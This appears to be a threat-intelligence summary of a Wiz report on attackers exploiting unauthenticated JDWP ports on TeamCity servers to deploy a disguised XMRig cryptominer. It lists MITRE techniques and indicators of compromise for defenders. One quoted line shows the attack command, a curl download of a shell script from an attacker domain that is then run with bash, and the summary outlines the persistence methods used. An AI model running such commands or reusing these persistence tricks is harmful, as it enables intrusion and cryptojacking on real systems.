Threat Research

Exposed JDWP Exploited in the Wild: What Happens When Debug Ports Are Left Open

WizBlog
Exposed JDWP Exploited in the Wild: What Happens When Debug Ports Are Left Open

A threat actor exploited exposed Java Debug Wire Protocol (JDWP) interfaces on TeamCity CI/CD servers to deploy a customized, stealthy XMRig cryptominer, achieving rapid remote code execution and establishing multiple persistence mechanisms. The attack involved abusing JDWP’s lack of authentication, using disguised payloads, and employing various persistence techniques including systemd services, cron jobs, and shell scripts. #JDWP #XMRig #TeamCity

Keypoints

  • An exposed JDWP interface on TeamCity was abused to perform remote code execution within hours of exposure.
  • The attacker deployed a modified XMRig cryptominer with hardcoded configuration designed to evade detection.
  • The payload used mining pool proxies to conceal the attacker’s cryptocurrency wallet address.
  • JDWP lacks authentication by default, making any exposed instance a critical vulnerability for remote exploitation.
  • Persistence was achieved through multiple mechanisms: rc.local scripts, disguised systemd services, shell startup files, and various cron jobs.
  • The attack utilized low-level JDWP instructions to execute commands and inject malicious scripts remotely without direct application access.
  • Widespread scanning for JDWP endpoints was observed, indicating high attacker interest and frequent targeting.

MITRE Techniques

  • [T1620] Reflective Code Loading – The attacker injected and executed arbitrary commands remotely via JDWP without restarting the Java application (‘…The attacker used JDWP’s protocol to create strings and invoke Runtime.exec() to download and execute payloads…’).
  • [T1059.004] Command and Scripting Interpreter: Unix Shell – The attack utilized shell commands such as curl and bash to deploy scripts (‘…Creating Java strings containing system commands such as: curl -o /tmp/logservice.sh -s https://canonicalconnect.com/logservice.sh bash /tmp/logservice.sh…’).
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder Script – Persistence was established by adding execution commands to shell startup files like .bashrc and .zshrc (‘…added to user-specific shell config files: .bashrc, .bash_logout, .zshrc…’).
  • [T1543.003] Create or Modify System Process: Systemd Service – A fake systemd service named logrotate was created to maintain persistence and disguise the malware (‘…dropped a fake systemd service that disguised itself as logrotate…’).
  • [T1053.003] Scheduled Task/Job: Cron – Multiple cron jobs were created in different cron directories to ensure payload re-execution (‘…created cron jobs across multiple locations and time intervals to maintain persistence…’).
  • [T1218] Signed Binary Proxy Execution – The logrotate binary was replaced with a modified, malicious XMRig binary to masquerade as a legitimate system utility (‘…malicious payload under the name logrotate to blend in with the legitimate system utility…’).

Indicators of Compromise

  • [SHA-1] Malicious scripts and binaries – a923de9df0766d6c4be46191117b8cc6486cf19c (logservice.sh), 1879d5fa0c2ca816fcb261e96338e325e76dca09 (logservice.sh), 18d83ba336ca6926ce8b9d68f104cff053f0c2f9 (o.sh), 815bc1a79440cdc4a7e1d876ff2dc7bc4f53d25e (logrotate variant), and multiple other hashes linked to logrotate and payload binaries.
  • [IP Addresses] Command and control and payload servers – 185.196.8.123 (File Server), 185.196.8.86 (Payloads File Server), 176.65.148.57, 176.65.148.86, 176.65.148.239 (JDWP scanners), 185.208.156.247:3333 (Mining Pool), 185.196.8.41 (Mining Pool).
  • [Domains] Malicious payload sources – https://awarmcorner.world, https://aheatcorner.world, https://canonicalconnect.com, https://cozy.yachts used for hosting attack payloads.
  • [URLs] Payload delivery scripts – https://s3.tebi.io/dhcpdc/o.sh used as an attack script delivery URL.

 

 

Read more: https://www.wiz.io/blog/exposed-jdwp-exploited-in-the-wild